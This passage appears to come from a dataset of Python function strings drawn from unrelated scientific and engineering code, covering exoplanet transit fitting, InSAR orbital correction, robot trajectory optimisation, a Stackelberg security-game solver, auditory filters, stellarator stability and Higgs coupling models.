\"Inclination data should not be include for coplanar fits\"\n\t\t\t\t\tcosi = np.abs( np.cos( x.reshape(-1,7)[:,4] ) )\n\t\t\t\t\tcosi0 = inclination_data[0]\n\t\t\t\t\tcosi_err = inclination_data[0]\n\t\t\t\t\tinc_chi2 = (cosi - cosi0) / cosi_err\n\t\t\t\n\t\t\tanswer = np.array([],dtype=float)\n\t\t\tfor i,t in enumerate(transits):\n\t\t\t\ttnums = self.Observations.transit_numbers[i]\n\t\t\t\ttry:\n\t\t\t\t\tanswer = np.append( answer,np.array(t[tnums]) )\n\t\t\t\texcept:\n\t\t\t\t\treturn -np.inf * np.ones(len(target_data))\n\t\t\t#\n\t\t\ttry:\n\t\t\t\tttvchi2 = (answer - target_data)/errors\n\t\t\texcept:\n\t\t\t\treturn -np.inf * np.ones(len(target_data))\n\t\t\t\n\t\t\tif inclination_data:\n\t\t\t\treturn np.append(ttvchi2,inc_chi2)\n\t\t\telse:\n\t\t\t\treturn ttvchi2\n\t\t\n\t\treturn leastsq(objectivefn, params0,full_output=1)", "def __Opt_value_depends_on_another_correct(self):\n strTestName = 'Test of value propagation onto optional parameters'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('parameter1', 'Reference parameter #1')\n RxCSObject.paramAddMan('parameter2', 'Reference parameter #2')\n\n RxCSObject.paramAddOpt('optpar1', 'Optional parameter #1', default='$$parameter1')\n RxCSObject.paramType('optpar1', int)\n RxCSObject.paramHE('optpar1', 4)\n RxCSObject.paramLE('optpar1', 4)\n\n RxCSObject.paramAddOpt('optpar2', 'Optional parameter #1', default='$$parameter2')\n RxCSObject.paramType('optpar2', int)\n RxCSObject.paramHE('optpar2', 1)\n RxCSObject.paramLE('optpar2', 1)\n \n RxCSObject.parameter1 = 4\n RxCSObject.parameter2 = 1\n \n 
self.__parametersCheck_error(RxCSObject, 'correct', strTestName)", "def anisotropy_solution(r, **kwargs):\n return 1", "def _orb_fit_calc(multi_paths: List[MultiplePaths], params, preread_ifgs=None) -> None:\n if not params[cf.ORBITAL_FIT]:\n log.info('Orbital correction not required!')\n print('Orbital correction not required!')\n return\n log.info('Calculating orbital correction')\n\n ifg_paths = [p.sampled_path for p in multi_paths]\n if preread_ifgs: # don't check except for mpi tests\n # perform some general error/sanity checks\n log.debug('Checking Orbital error correction status')\n if mpiops.run_once(shared.check_correction_status, ifg_paths, ifc.PYRATE_ORBITAL_ERROR):\n log.debug('Orbital error correction not required as all ifgs are already corrected!')\n return # return if True condition returned\n\n if params[cf.ORBITAL_FIT_METHOD] == 1:\n prcs_ifgs = mpiops.array_split(ifg_paths)\n orbital.remove_orbital_error(prcs_ifgs, params, preread_ifgs)\n else:\n # Here we do all the multilooking in one process, but in memory\n # can use multiple processes if we write data to disc during\n # remove_orbital_error step\n # A performance comparison should be made for saving multilooked\n # files on disc vs in memory single process multilooking\n if mpiops.rank == MASTER_PROCESS:\n headers = [find_header(p, params) for p in multi_paths]\n orbital.remove_orbital_error(ifg_paths, params, headers, preread_ifgs=preread_ifgs)\n mpiops.comm.barrier()\n log.debug('Finished Orbital error correction')", "def prepare(self) -> None:\n\n \"\"\"\n Objective function\n Coefficient -2 means that we solve maximization problem (multiple all \n value to -1) and also there are left coverage area and right coverage \n area for each station (2* cov)\n \"\"\"\n\n f = [-2 * self.cov[i] for i in range(self.get_column_num)]\n self._f = np.array(f)\n\n \"\"\" Inequality Constraints\"\"\"\n ineq_cost = [self.cost[i] for i in range(self.get_column_num)]\n self._ineq_constraints = np.array(ineq_cost)\n self._b = np.array(self.cost_limit)\n\n \"\"\" \n There is no equality constraints. 
\n self._eq_constraints is empty\n self._beq is empty\n \"\"\"", "def solve_traj(self, init_joint, final_joint, potential_goal_states, coeffs={}, object_pos=[0, 0.2, 0.83]):\n self.scene.robot.SetDOFValues(init_joint, self.scene.manipulator.GetArmIndices())\n\n _, default_traj = self.get_default_traj(\n init_joint, final_joint, self.n_pred_timesteps, potential_goal_states)\n self.scene.robot.SetDOFValues(init_joint, self.scene.manipulator.GetArmIndices())\n\n request = req_util.create_empty_request(\n self.n_pred_timesteps, final_joint, self.scene.manipulator_name,potential_goal_states)\n if \"distance\" in coeffs:\n req_util.add_distance_cost(request, self.complete_pred_traj_means_expanded,\n self.complete_pred_traj_vars_expanded, coeffs[\"distance\"], self.n_human_joints, self.scene.all_links)\n if \"distanceBaseline\" in coeffs:\n req_util.add_distance_baseline_cost(request, self.head_pos, self.torso_pos, self.feet_pos, self.scene.all_links, self.n_pred_timesteps, coeffs[\"distanceBaseline\"])\n \n if \"visibilityBaseline\" in coeffs:\n req_util.add_visibility_baseline_cost(request, self.head_pos, object_pos, self.scene.eef_link_name, self.n_pred_timesteps, coeffs[\"visibilityBaseline\"])\n\n if \"legibilityBaseline\" in coeffs:\n req_util.add_legibility_baseline_cost(\n request, coeffs[\"legibilityBaseline\"], self.scene.eef_link_name)\n if \"collision\" in coeffs:\n req_util.add_collision_cost(\n request, coeffs[\"collision\"][\"cost\"], coeffs[\"collision\"][\"dist_pen\"])\n if \"nominal\" in coeffs:\n req_util.add_optimal_trajectory_cost(\n request, default_traj, self.scene.eef_link_name, self.n_pred_timesteps, coeffs[\"nominal\"])\n if \"regularize\" in coeffs:\n req_util.add_regularize_cost(\n request, coeffs[\"regularize\"], self.scene.eef_link_name)\n if \"smoothing\" in coeffs:\n req_util.add_smoothing_cost(\n request, coeffs[\"smoothing\"][\"cost\"], coeffs[\"smoothing\"][\"type\"])\n if \"velocity\" in coeffs:\n req_util.add_velocity_cost(request, self.complete_pred_traj_means_expanded,\n self.complete_pred_traj_vars_expanded, coeffs[\"velocity\"], self.n_human_joints, self.scene.all_links)\n if \"visibility\" in coeffs:\n head_pred_traj_mean, head_pred_traj_var = traj_utils.create_human_head_means_vars(\n self.complete_pred_traj_means_expanded, self.complete_pred_traj_vars_expanded)\n req_util.add_visibility_cost(request, head_pred_traj_mean, head_pred_traj_var,\n coeffs[\"visibility\"], object_pos, self.scene.eef_link_name)\n if \"legibility\" in coeffs:\n req_util.add_legibility_cost(\n request, coeffs[\"legibility\"], self.scene.eef_link_name)\n \n if \"joint_vel\" in coeffs:\n req_util.add_joint_vel_cost(request, coeffs[\"joint_vel\"])\n\n result = self.optimize_problem(request)\n eef_traj = self.scene.follow_trajectory(np.array(result.GetTraj()))\n return result, eef_traj", "def solvePostDualEllipsoid(targetNum, defenders, dRewards, dPenalties, dCosts, aTypes, aRewards, aPenalties, q, maxIterations=5000):\n #\n # NEEDS ATTACKER AVG PER ATTACKER\n #\n \"\"\"Contains as many dummy targets as defenders, for defenders and attackers\"\"\"\n \"\"\"This problem is the dual of the primal above, and is solved using the ellipsoid method.\"\"\"\n # Add extra dummy targets\n _dRewards = copy.deepcopy(dRewards)\n _dPenalties = copy.deepcopy(dPenalties)\n _dCosts = copy.deepcopy(dCosts)\n _aRewards = copy.deepcopy(aRewards)\n _aPenalties = copy.deepcopy(aPenalties)\n for m in defenders:\n for defenderCount in defenders:\n _dRewards[m].append(0)\n _dPenalties[m].append(0)\n 
_dCosts[m].append(0)\n for lam in aTypes:\n _aRewards[lam].append(0)\n _aPenalties[lam].append(0)\n targetNumWithDummies = len(_dRewards[0])\n targetRange = list(range(targetNumWithDummies))\n\n # This is so we can reconstruct s later\n constraintMap = {}\n\n # Get the suggestions that occur with no overlap\n overlapPlacements = getPlacements(defenders, targetNumWithDummies)\n placements = list(filter(lambda x: len(set(x)) == len(x), overlapPlacements))\n s = [(sd,sa) for sd in placements for sa in targetRange]\n\n # Generate the keys\n aKeys = [(t,tPrime,lam) for t in targetRange for tPrime in targetRange for lam in aTypes]\n bKeys = [(t,tPrime,d) for t in targetRange for tPrime in targetRange for d in defenders]\n\n # Get a random subset of the placements\n subsetCount = int(len(placements) * 0.001)\n if subsetCount == 0:\n subsetCount = len(placements) // 4\n subsetS = random.choices(s, k=subsetCount)\n\n # Create the model\n relaxedModel = Model('relaxedModel')\n # Create the variables\n g = relaxedModel.continuous_var_dict(keys=aTypes, lb=-1000, ub=1000, name=\"g\") # unbounded\n a = relaxedModel.continuous_var_dict(keys=aKeys, lb=0, ub=1000, name=\"a\") # No upper bound\n b = relaxedModel.continuous_var_dict(keys=bKeys, lb=0, ub=1000, name=\"b\") # No upper bound\n # objective function:\n objectiveFunction = sum([g[lam] for lam in aTypes])\n # Initial constraints\n initialConstraints = []\n for sd,sa in subsetS:\n for lam in aTypes:\n constraint = sum([(aUtility(sd,tPrime,lam,_aPenalties,_aRewards) - aUtility(sd,sa,lam,_aPenalties,_aRewards)) * a[sa,tPrime,lam] for tPrime in targetRange]) + \\\n q[lam] * sum([(utilityM(tPrime,sd,sa,d,_dRewards,_dPenalties,_dCosts) - utilityM(sd[d],sd,sa,d,_dRewards,_dPenalties,_dCosts)) * b[sd[d],tPrime,d] for d in defenders for tPrime in targetRange]) + \\\n g[lam] \\\n >= q[lam] * defenderSocialUtility(sd,sa,defenders,_dRewards,_dCosts,_dPenalties)\n initialConstraints.append(constraint)\n constraintMap[constraint] = (sd,sa,lam)\n\n dualConstraints = relaxedModel.add_constraints(initialConstraints)\n\n # Solve the dual using column generation\n for _ in range(maxIterations):\n #print(f\"ITERATION: {_}\", flush=True)\n\n relaxedModel.minimize(objectiveFunction)\n relaxedModel.solve() # Alpha and Beta have values for each instance of target and attacker\n #print(f\"Utility on iteration {_} = {relaxedModel.solution.get_objective_value()}\", flush=True)\n\n # For every lam,t0, split (9) into two subproblems and solve each.\n violatedConstraints = False\n signalsToBeAdded = []\n for lam in aTypes:\n for t0 in targetRange:\n # Subproblem 1\n edges = {}\n # Graph weights with normal defenders\n for d in defenders:\n edges[f\"d_{d}\"] = {}\n for t in targetRange:\n if t == t0:\n weightValue = 10000000\n else:\n weightValue = (-q[lam]) * _dCosts[d][t] \\\n + q[lam] * (_dRewards[d][t0] + _dCosts[d][t0] - _dPenalties[d][t0] - _dCosts[d][t]) * float(b[t,t0,d]) \\\n + q[lam] * (sum([(_dCosts[d][tPrime] - _dCosts[d][t]) * float(b[t,tPrime,d]) for tPrime in targetRange if tPrime != t0])) \\\n + (_aPenalties[lam][t] - _aRewards[lam][t0]) * float(a[t0,t,lam])\n edges[f\"d_{d}\"][f\"t_{t}\"] = {\"weight\": weightValue}\n # Graph weights with added defenders\n for d in range(len(defenders), targetNumWithDummies):\n edges[f\"ed_{d}\"] = {}\n for t in targetRange:\n weightValue = (_aRewards[lam][t] - _aRewards[lam][t0]) * float(a[t0,t,lam])\n edges[f\"ed_{d}\"][f\"t_{t}\"] = {\"weight\": weightValue}\n\n # Solve the problem\n G = nx.from_dict_of_dicts(edges)\n 
matchings = nx.algorithms.bipartite.minimum_weight_full_matching(G)\n newPlacement = [0] * len(defenders)\n for k,v in matchings.items():\n if k.startswith(\"d_\"):\n defender = int(k.split(\"_\")[1])\n target = int(v.split(\"_\")[1])\n newPlacement[defender] = target\n\n # Check the value of this s using (10) -- if negative, add s to\n # the subset of solutions.\n value = sum([(aUtility(newPlacement,tPrime,lam,_aPenalties,_aRewards) - aUtility(newPlacement,t0,lam,_aPenalties,_aRewards)) * float(a[t0,tPrime,lam]) for tPrime in targetRange])\\\n + q[lam] * sum([(utilityM(tPrime,newPlacement,t0,d,_dRewards,_dPenalties,_dCosts) - utilityM(newPlacement[d],newPlacement,t0,d,_dRewards,_dPenalties,_dCosts)) * float(b[newPlacement[d],tPrime,d]) for d in defenders for tPrime in targetRange])\\\n - (q[lam] * defenderSocialUtility(newPlacement,t0,defenders,_dRewards,_dCosts,_dPenalties)) + float(g[lam])\n\n if value < EPSILON:\n signal = (newPlacement,t0)\n if signal not in signalsToBeAdded:\n violatedConstraints = True\n signalsToBeAdded.append(signal)\n\n # Subproblem 2\n # Fix each possible defender that coveres t0. For each of these, find\n # the best matching\n for d0 in defenders:\n edges = {}\n # Graph weights with normal defenders (minus d0 and t0)\n for d in defenders:\n if d != d0:\n edges[f\"d_{d}\"] = {}\n for t in targetRange:\n if t != t0:\n weightValue = (_aPenalties[lam][t] - _aPenalties[lam][t0]) * float(a[t0,t,lam]) \\\n + q[lam] * (sum([(_dCosts[d][tPrime] - _dCosts[d][t]) * float(b[t,tPrime,d]) for tPrime in targetRange])) \\\n - (q[lam] * _dCosts[d][t])\n edges[f\"d_{d}\"][f\"t_{t}\"] = {\"weight\": weightValue}\n # Graph weights with added defenders (minus t0)\n for d in range(len(defenders), targetNumWithDummies):\n edges[f\"ed_{d}\"] = {}\n for t in targetRange:\n if t != t0:\n weightValue = (_aRewards[lam][t] - _aPenalties[lam][t0]) * float(a[t0,t,lam])\n edges[f\"ed_{d}\"][f\"t_{t}\"] = {\"weight\": weightValue}\n\n # Solve the problem\n G = nx.from_dict_of_dicts(edges)\n matchings = nx.algorithms.bipartite.minimum_weight_full_matching(G)\n newPlacement = [0] * len(defenders)\n for k,v in matchings.items():\n if k.startswith(\"d_\"):\n defender = int(k.split(\"_\")[1])\n target = int(v.split(\"_\")[1])\n newPlacement[defender] = target\n newPlacement[d0] = t0\n\n # Check the value of this s using (9) -- if negative, add s to\n # the subset of solutions.\n value = sum([(aUtility(newPlacement,tPrime,lam,_aPenalties,_aRewards) - aUtility(newPlacement,t0,lam,_aPenalties,_aRewards)) * float(a[t0,tPrime,lam]) for tPrime in targetRange])\\\n + q[lam] * sum([(utilityM(tPrime,newPlacement,t0,d,_dRewards,_dPenalties,_dCosts) - utilityM(newPlacement[d],newPlacement,t0,d,_dRewards,_dPenalties,_dCosts)) * float(b[newPlacement[d],tPrime,d]) for d in defenders for tPrime in targetRange])\\\n - (q[lam] * defenderSocialUtility(newPlacement,t0,defenders,_dRewards,_dCosts,_dPenalties)) + float(g[lam])\n\n if value < EPSILON:\n signal = (newPlacement,t0)\n if signal not in signalsToBeAdded:\n violatedConstraints = True\n signalsToBeAdded.append(signal)\n\n # Now that we have checked all the violated constraints, either return\n # the solution ( get the dual values) or recompute the optimal value of\n # the dual with additional constraints\n newConstraints = []\n for sd,sa in signalsToBeAdded:\n for lam in aTypes:\n newConstraint = sum([(aUtility(sd,tPrime,lam,_aPenalties,_aRewards) - aUtility(sd,sa,lam,_aPenalties,_aRewards)) * a[sa,tPrime,lam] for tPrime in targetRange]) + \\\n q[lam] * 
sum([(utilityM(tPrime,sd,sa,d,_dRewards,_dPenalties,_dCosts) - utilityM(sd[d],sd,sa,d,_dRewards,_dPenalties,_dCosts)) * b[sd[d],tPrime,d] for d in defenders for tPrime in targetRange]) + \\\n g[lam] \\\n >= q[lam] * defenderSocialUtility(sd,sa,defenders,_dRewards,_dCosts,_dPenalties)\n newConstraints.append(newConstraint)\n constraintMap[newConstraint] = (sd,sa,lam)\n relaxedModel.add_constraints(newConstraints)\n for signal in signalsToBeAdded:\n subsetS.append(signal)\n if not violatedConstraints:\n break\n # print(relaxedModel.dual_values(relaxedModel.iter_constraints()))\n utilityPerDefender = relaxedModel.solution.get_objective_value() / len(defenders)\n utilityPerAttacker = 0\n constraints = relaxedModel.iter_constraints()\n for constraint in constraints:\n sd, sa, lam = constraintMap[constraint]\n prob = relaxedModel.dual_values([constraint])[0]\n utilityPerAttacker += aUtility(sd,sa,lam,_aPenalties,_aRewards) * prob\n utilityPerAttacker /= len(aTypes)\n return utilityPerDefender, utilityPerAttacker, None#relaxedModel.dual_values(relaxedModel.iter_constraints())", "def _calculate_filter_parameters(self):\n dt = 1.0 / self._fs\n nl_b_wq = 180.0\n nl_b_wp = 0.14\n nlin_bw = nl_b_wp * self._cf + nl_b_wq\n nlin_phi = 2.0 * numpy.pi * nlin_bw * dt\n nlin_theta = 2.0 * numpy.pi * self._cf * dt\n nlin_cos_theta = numpy.cos(nlin_theta)\n nlin_sin_theta = numpy.sin(nlin_theta)\n nlin_alpha = -numpy.exp(-nlin_phi) * nlin_cos_theta\n nlin_a1 = 2.0 * nlin_alpha\n nlin_a2 = numpy.exp(-2.0 * nlin_phi)\n nlin_z1 = complex(\n (1.0 + nlin_alpha * nlin_cos_theta), -\n (nlin_alpha * nlin_sin_theta))\n nlin_z2 = complex(\n (1.0 + nlin_a1 * nlin_cos_theta), -\n (nlin_a1 * nlin_sin_theta))\n nlin_z3 = complex(\n (nlin_a2 * numpy.cos(2.0 * nlin_theta)), -\n (nlin_a2 * numpy.sin(2.0 * nlin_theta)))\n nlin_tf = (nlin_z2 + nlin_z3) / nlin_z1\n nlin_b0 = abs(nlin_tf)\n nlin_b1 = nlin_alpha * nlin_b0\n\n lin_b_wq = 235.0\n lin_b_wp = 0.2\n lin_bw = lin_b_wp * self._cf + lin_b_wq\n lin_phi = 2.0 * numpy.pi * lin_bw * dt\n lin_c_fp = 0.62\n lin_c_fq = 266.0\n lin_cf = lin_c_fp * self._cf + lin_c_fq\n lin_theta = 2.0 * numpy.pi * lin_cf * dt\n lin_cos_theta = numpy.cos(lin_theta)\n lin_sin_theta = numpy.sin(lin_theta)\n lin_alpha = -numpy.exp(-lin_phi) * lin_cos_theta\n lin_a1 = 2.0 * lin_alpha\n lin_a2 = numpy.exp(-2.0 * lin_phi)\n lin_z1 = complex(\n (1.0 + lin_alpha * lin_cos_theta), -\n (lin_alpha * lin_sin_theta))\n lin_z2 = complex(\n (1.0 + lin_a1 * lin_cos_theta), -\n (lin_a1 * lin_sin_theta))\n lin_z3 = complex(\n (lin_a2 * numpy.cos(2.0 * lin_theta)), -\n (lin_a2 * numpy.sin(2.0 * lin_theta)))\n lin_tf = (lin_z2 + lin_z3) / lin_z1\n lin_b0 = abs(lin_tf)\n lin_b1 = lin_alpha * lin_b0\n\n return [lin_a1, lin_a2, lin_b0, lin_b1, nlin_a1, nlin_a2, nlin_b0,\n nlin_b1]", "def mercier(self):\n\n # See Overleaf note \"Mercier criterion near the magnetic axis- detailed notes\".\n # See also \"20200604-02 Checking sign in Mercier DGeod near axis.docx\"\n\n # Shorthand:\n d_l_d_phi = self.d_l_d_phi\n B0 = self.B0\n G0 = self.G0\n p2 = self.p2\n etabar = self.etabar\n curvature = self.curvature\n sigma = self.sigma\n iotaN = self.iotaN\n iota = self.iota\n pi = np.pi\n\n #integrand = d_l_d_phi * (Y1c * Y1c + X1c * (X1c + Y1s)) / (Y1c * Y1c + (X1c + Y1s) * (X1c + Y1s))\n integrand = d_l_d_phi * (etabar*etabar*etabar*etabar + curvature*curvature*curvature*curvature*sigma*sigma + etabar*etabar*curvature*curvature) \\\n / (etabar*etabar*etabar*etabar + curvature*curvature*curvature*curvature*(1+sigma*sigma) + 
2*etabar*etabar*curvature*curvature)\n\n integral = np.sum(integrand) * self.d_phi * self.nfp * 2 * pi / self.axis_length\n\n #DGeod_times_r2 = -(2 * sG * spsi * mu0 * mu0 * p2 * p2 * G0 * G0 * G0 * G0 * etabar * etabar &\n self.DGeod_times_r2 = -(2 * mu0 * mu0 * p2 * p2 * G0 * G0 * G0 * G0 * etabar * etabar \\\n / (pi * pi * pi * B0 * B0 * B0 * B0 * B0 * B0 * B0 * B0 * B0 * B0 * iotaN * iotaN)) \\\n * integral\n\n self.d2_volume_d_psi2 = 4*pi*pi*abs(G0)/(B0*B0*B0)*(3*etabar*etabar - 4*self.B20_mean/B0 + 2 * (self.G2 + iota * self.I2)/G0)\n\n self.DWell_times_r2 = (mu0 * p2 * abs(G0) / (8 * pi * pi * pi * pi * B0 * B0 * B0)) * \\\n (self.d2_volume_d_psi2 - 8 * pi * pi * mu0 * p2 * abs(G0) / (B0 * B0 * B0 * B0 * B0))\n\n self.DMerc_times_r2 = self.DWell_times_r2 + self.DGeod_times_r2", "def minimize(self):\n self.normalize()\n p0s = self.spacedvals(method='random')\n if self.n_spots > 1:\n opts = self.multifit(p0s)\n else:\n opts = self.singlefit(p0s)\n self.yf = [self.solve(theta) for theta in opts]\n self.bestps = opts\n return opts", "def solve_environment(self):\n \n #The first problem formulation\n #K kinds of towers\n #See more details about problem formulation in the writeup \n \n #Get a full matrix of the concatenated coverage matrices for \n #each tower type. THis new matrix has dimensions:\n #(Ntowers) x (sum(potential sites)), where the sum o=is over all tower types\n coverage = np.hstack(i for i in self.coverage_matrices)\n print coverage\n print coverage.shape \n \n #Diagonal matrix of the values of each target\n #(for the scenarios where we don't care about maximizing covered value,\n #target_values is just all ones, so this is just the identity matrix)\n V = np.diag(self.target_values)\n \n #If doing scenario where we want to fortify weakest link, only makes\n #sense if all targets are equal value:\n if self.objective_type == 'min_entries':\n V = np.eye(len(self.target_values))\n\n #Get the matrix of coverage values / expected value saved:\n C = np.dot(V,coverage)\n print 'V', V\n print 'coverage', coverage\n print 'C', C\n \n \n #Since not gauranteed to reach global optimum on any particular initialization,\n #run a few times and take the best result.\n #Just define \"best result\" as the result which had the most overall \n #\"converged\" x, combined over all tower kinds. \n# for j in xrange(self.N_random_starts_max):\n \n \n a = 2. #1.\n tau = 1e-4\n N = sum(i for i in self.N_tower_sites)\n w = np.zeros(N)\n ones = np.ones(N)\n p = 1. 
#the exponents power when doing he exponent method:\n \n for i in xrange(self.N_reweighting_iterations_max):\n #The concatenated vector of occupancies: Concatenated over all\n #of the kinds of towers.\n x = cvx.Variable(N)\n \n #Different objective functions depending on which optimization problem.\n #These are defined in the scenarios in the main function.\n if self.objective_type == 'min_entries':\n operation = cvx.min_entries\n elif self.objective_type == 'sum_entries':\n operation = cvx.sum_entries\n else:\n raise Exception('must specify valid objective_type')\n \n #Objective function includes penalty term for non-binary x values\n if self.penalty_type == 'reweighted_L1':\n #objective = cvx.Maximize(t - x.T*w)\n objective = cvx.Maximize(operation(C*x - x.T*w))\n\n\n #Main constraints on 0<=x<=1\n constraints = [0<=x, x<=1]\n \n \n #And then for each kind of tower, append the constraint that there\n #be exactly N_i towers, or <= quota (depending on constraint type)\n if self.constraints__type == 'fixed_N_towers' or self.constraints__type == 'tower_quotas':\n for tk in xrange(self.N_tower_kinds):\n before_sum = np.concatenate(([0],np.cumsum(self.N_tower_sites)))[tk]\n print before_sum\n print before_sum + self.N_tower_sites[tk]\n if self.constraints__type == 'fixed_N_towers':\n constraints.append(cvx.sum_entries(\n x[before_sum : before_sum + self.N_tower_sites[tk]]\n )==self.N_towers[tk])\n elif self.constraints__type == 'tower_quotas':\n constraints.append(cvx.sum_entries(\n x[before_sum : before_sum + self.N_tower_sites[tk]]\n )<=self.budget__tower_quotas[tk])\n print x[before_sum : before_sum + self.N_tower_sites[tk]]\n \n elif self.constraints__type == 'total_cost':\n costs = np.hstack([np.repeat(self.budget__tower_unit_costs[tk],self.N_tower_sites[tk]) for tk in xrange(self.N_tower_kinds)])\n constraints.append(cvx.sum_entries(costs * x) <= self.budget__total_cost) \n \n \n \n\n\n \n \n print 'penalty_type', self.penalty_type\n print 'objective_type', self.objective_type\n print 'constraints__type', self.constraints__type\n print 'budget__tower_quotas', self.budget__tower_quotas\n print 'operation', operation\n print 'objective', objective\n print 'constraints', constraints\n cvx.Problem(objective, constraints).solve(verbose=self.VERBOSE)\n x = np.array(x.value).flatten()\n print 'x', x\n w = a/(tau+np.abs(x))\n p += 1.\n plt.figure(figsize=(5,5))\n plt.plot(x,marker='o')\n plt.savefig('histrograms_{}.png'.format(i))\n print \n \n \n \n \n #From the solution x, get the coordinates of those tower sites where we\n #really do want to place a tower\n #use = np.isclose(x,1.)\n for tk in xrange(self.N_tower_kinds):\n before_sum = np.concatenate(([0],np.cumsum(self.N_tower_sites)))[tk]\n y = x[before_sum : before_sum + self.N_tower_sites[tk]]\n inds = np.argsort(y)\n s = y[inds]\n use = np.where(s>.5)[0]\n print inds\n print s\n print use \n if self.constraints__type == 'fixed_N_towers':\n if len(use) != self.N_towers[tk]:\n print 'Solution did not converge properly. 
Choosing the K best towers.'\n print self.N_towers[tk], len(use)\n # use = use[-self.N_towers[tk]:]\n use = inds[-self.N_towers[tk]:]\n elif self.constraints__type == 'tower_quotas':\n pass #Just use the towers thresholded at > .5\n print use\n \n \n self.coordinates__solved_towers.append([self.coordinates__tower_sites[tk][mm] for mm in inds[use]])", "def _bowl_params(self):\n self.vars['bowl_strength'] = self.bowl.strength + \\\n self.vars['beta_min_offset']\n self.vars['q_init'] = self.vars['bowl_strength']\n if self.vars['bowl_strength'] <= self.vars['beta_min_offset']:\n print(\n f\"Bowl overflow -- Set to the minimum value : {self.vars['beta_min_offset']}\")\n # raise ValueError(\"Bowl overflow... strength lower than set tolerance. Modify the tolerance or fix the bug!\")\n self.vars['bowl_strength'] = self.vars['beta_min_offset']\n if self.vars['bowl_strength'] > self.vars['q_max']:\n self.vars['bowl_strength'] = self.vars['q_max']\n\n self.vars['zeta_bowl'] = self.toNeural(self.bowl.center)\n print(f\"Value for Q set to {self.vars['bowl_strength']}\")", "def _UpdateCriteria(self):\n grad = self.traj.grad[-1]\n disp = self.traj.coords[-1] - self.traj.coords[-2]\n self.delta_e = self.traj.energy[-1] - self.traj.energy[-2]\n self.grad_max = numpy.amax(grad)\n self.disp_max = numpy.amax(disp)\n self.grad_rms = math.sqrt(numpy.mean(grad**2))\n self.disp_rms = math.sqrt(numpy.mean(disp**2))", "def doParametersOfInterest(self):\n \n self.modelBuilder.doVar('expr::cosW(\"0.87681811112\",)')\n self.modelBuilder.doVar('expr::sinW(\"0.48082221247\",)')\n self.modelBuilder.doVar('expr::mZ(\"91.2\",)')\n self.modelBuilder.doVar('expr::Lambda1(\"100.0\",)')\n self.modelBuilder.doVar('expr::e2(\"0.0917\",)')\n self.modelBuilder.doVar('expr::gs2(\"1.533\",)')\n\n # EFT Higgs basis couplings\n\n self.modelBuilder.doVar('cZ[0,-1,1]') \n self.modelBuilder.doVar(\"cZZ[0,-2,2]\") \n self.modelBuilder.doVar(\"cZZt[0,-2,2]\") \n self.modelBuilder.doVar(\"cZB[0,-6,6]\") \n\n poi='cZ,cZZ,cZZt,cZB'\n\n # Amplitude couplings from EFT couplings \n\n self.modelBuilder.doVar('expr::a1(\"@0+1\",cZ)') # (\"2*(@0+1)\",cZ) in AN/Paper but a1 = 1 for signal model and width calculation\n self.modelBuilder.doVar('expr::a2(\"-1*@0*(@1/(2*pow(@2,2)*pow(@3,2)))\",cZZ,e2,sinW,cosW)')\n self.modelBuilder.doVar('expr::a3(\"-1*@0*(@1/(2*pow(@2,2)*pow(@3,2)))\",cZZt,e2,sinW,cosW)')\n self.modelBuilder.doVar('expr::k1(\"@0*(@1*pow(@2,2)/(pow(@3,2)*pow(@4,2)))\",cZB,e2,Lambda1,sinW,mZ)')\n self.modelBuilder.doVar('expr::k1L1(\"@0/pow(@1,2)\",k1,Lambda1)')\n\n ###### gamma_H ########\n\n # SMEFT relationships for VV couplings (Expressed using amplitude couplings)\n\n self.modelBuilder.doVar('expr::kappa(\"1.0\",)')\n self.modelBuilder.doVar('expr::kappa_tilde(\"0.0\",)') \n\n self.modelBuilder.doVar('expr::a1_WW(\"@0\",a1)')\n self.modelBuilder.doVar('expr::a2_WW(\"@0*@0*@1\",cosW,a2)')\n self.modelBuilder.doVar('expr::a3_WW(\"@0*@0*@1\",cosW,a3)')\n self.modelBuilder.doVar('expr::k1_WW(\"(@2 / (@0*@0 - @1*@1) - 2*@1*@1*@3*@4*@4 /(@5*@5*(@0*@0 - @1*@1)))\",cosW,sinW,k1,a2,Lambda1,mZ)')\n self.modelBuilder.doVar('expr::k2_k1(\"2*@0*@1*@2/(@0*@0 - @1*@1)\",cosW,sinW,k1)')\n self.modelBuilder.doVar('expr::k2_a2(\"-2*@0*@1*@3*@4*@4/((@2*@2)*(@0*@0 - @1*@1))\",cosW,sinW,mZ,a2,Lambda1)')\n self.modelBuilder.doVar('expr::k2(\"@0 + @1\",k2_k1,k2_a2)')\n\n # Determine gamma_H from VV couplings\n\n zz_expr = '\"4*(@0*@0/4. + 0.1695*@3*@3 + 0.09076*@1*@1 + 0.03809*@2*@2 + 0.8095*@0*@3/2. + 0.5046*@0*@1/2. 
+ 0.2092*@1*@3 + 0.1023*@4*@4 + 0.1901*@0*@4/2. + 0.07429*@3*@4 + 0.04710*@1*@4) \",a1,a2,a3,k1,k2'\n ww_expr = '\"4*(@0*@0/4. + 0.1320*@3*@3 + 0.1944*@1*@1 + 0.08075*@2*@2 + 0.7204*@0*@3/2. + 0.7437*@0*@1/2. + 0.2774*@3*@1) \",a1_WW,a2_WW,a3_WW,k1_WW'\n zgamma_expr = '\"4*(1.118600*@0*@0/4. +0.0035*@1*@1 - 0.125010*@0*@1/2. + 0.000003*@1*@1 - 0.00018*@1*@1 + 0.003100*@0*@1/2. +0.00126*@2*@2 + 0.000005*@2*@2 -0.00047*@2*@2)\",a1_WW,kappa,kappa_tilde'\n gg_expr = '\"(1.1068*@0*@0 + 0.0082*@0*@0 - 0.1150*@0*@0 + 2.5717*@1*@1 + 0.0091*@1*@1 - 0.1982*@1*@1)\",kappa,kappa_tilde'\n bb_expr = '\"(@0*@0 + @1*@1)\",kappa,kappa_tilde'\n cc_expr = '\"(@0*@0 + @1*@1)\",kappa,kappa_tilde'\n tautau_expr = '\"(@0*@0 + @1*@1)\",kappa,kappa_tilde'\n mumu_expr = '\"(@0*@0 + @1*@1)\",kappa,kappa_tilde'\n gmgm_expr = '\"4*(1.6054*@0*@0/4. + 0.07312*@1*@1 - 0.6854*@0*@1/2. + 0.00002*@1*@1 - 0.0018*@1*@1 + 0.0085*@0*@1/2. + 0.1699*@2*@2 + 0.00002*@2*@2 - 0.0031*@2*@2)\",a1_WW,kappa,kappa_tilde'\n \n self.modelBuilder.doVar('expr::R_WW('+str(ww_expr)+')')\n self.modelBuilder.doVar('expr::R_ZZ('+str(zz_expr)+')')\n self.modelBuilder.doVar('expr::R_Zgamma('+str(zgamma_expr)+')')\n self.modelBuilder.doVar('expr::R_gg('+str(gg_expr)+')')\n self.modelBuilder.doVar('expr::R_bb('+str(bb_expr)+')')\n 